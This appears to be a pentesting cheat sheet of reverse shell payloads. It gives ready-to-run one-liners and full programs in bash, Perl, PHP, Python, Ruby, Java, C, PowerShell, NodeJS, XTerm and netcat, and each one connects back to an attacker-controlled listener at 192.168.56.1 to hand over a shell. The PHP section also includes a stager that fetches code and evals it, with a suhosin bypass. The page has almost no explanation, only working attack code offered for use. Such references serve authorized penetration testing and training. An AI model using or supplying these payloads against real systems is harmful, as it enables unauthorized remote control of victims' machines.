Reverse Shells
bash
bash -i >& /dev/tcp/192.168.56.1/443 0>&1
Perl
perl -e 'use Socket;$i="192.168.56.1";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP
php -r '$sock=fsockopen("192.168.56.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php
error_reporting(0);
$ip = '192.168.56.1';
$port = 4444;
if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
}
if (!$s && ($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
}
if (!$s && ($f = 'socket_create') && is_callable($f)) {
$s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) {
die();
}
$s_type = 'socket';
}
if (!$s_type) {
die('no socket funcs');
}
if (!$s) {
die('no socket');
}
switch ($s_type) {
case 'stream': $len = fread($s, 4);
break;
case 'socket': $len = socket_read($s, 4);
break;
}
if (!$len) {
die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b));
break;
case 'socket': $b .= socket_read($s, $len-strlen($b));
break;
}
}
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) {
$suhosin_bypass=create_function('', $b); $suhosin_bypass();
}
else {
eval($b);
}
die();
?>
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Ruby
ruby -rsocket -e'f=TCPSocket.open("192.168.56.1",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.56.1/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
XTerm
xterm -display 192.168.56.1:1
C
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(void)
{
int i; // used for dup2 later
int sockfd; // socket file descriptor
socklen_t socklen; // socket-length for new connections
struct sockaddr_in srv_addr; // client address
srv_addr.sin_family = AF_INET; // server socket type address family = internet protocol address
srv_addr.sin_port = htons( 443 ); // connect-back port, converted to network byte order
srv_addr.sin_addr.s_addr = inet_addr("192.168.56.1"); // connect-back ip , converted to network byte order
// create new TCP socket
sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
// connect socket
connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));
// dup2-loop to redirect stdin(0), stdout(1) and stderr(2)
for(i = 0; i <= 2; i++)
dup2(sockfd, i);
// magic
execve( "/bin/sh", NULL, NULL );
}
PowerShell
# Setup connection to the attacker listener (change IP and PORT)
$client = New-Object System.Net.Sockets.TCPClient('192.168.56.1', 4444);
# Stream Handle
$stream = $client.GetStream();
# Recv buffer
[byte[]]$bytes = 0..65535|%{0};
# While stream is not empty
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
# Get command (bytes to string)
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
# Execute Command
$sendback = (iex $data 2>&1 | Out-String);
# Send back PS header PS C:\Windows\TEMP\>
$sendback2 = $sendback+'PS '+(pwd).Path + '> ';
# Convert result (String to bytes)
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
# Send result
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush();
};
NodeJS
(function() {
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(4444, "192.168.56.1", function() {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/;
})();
Netcat
nc -e /bin/sh 192.168.56.1 4444
Last updated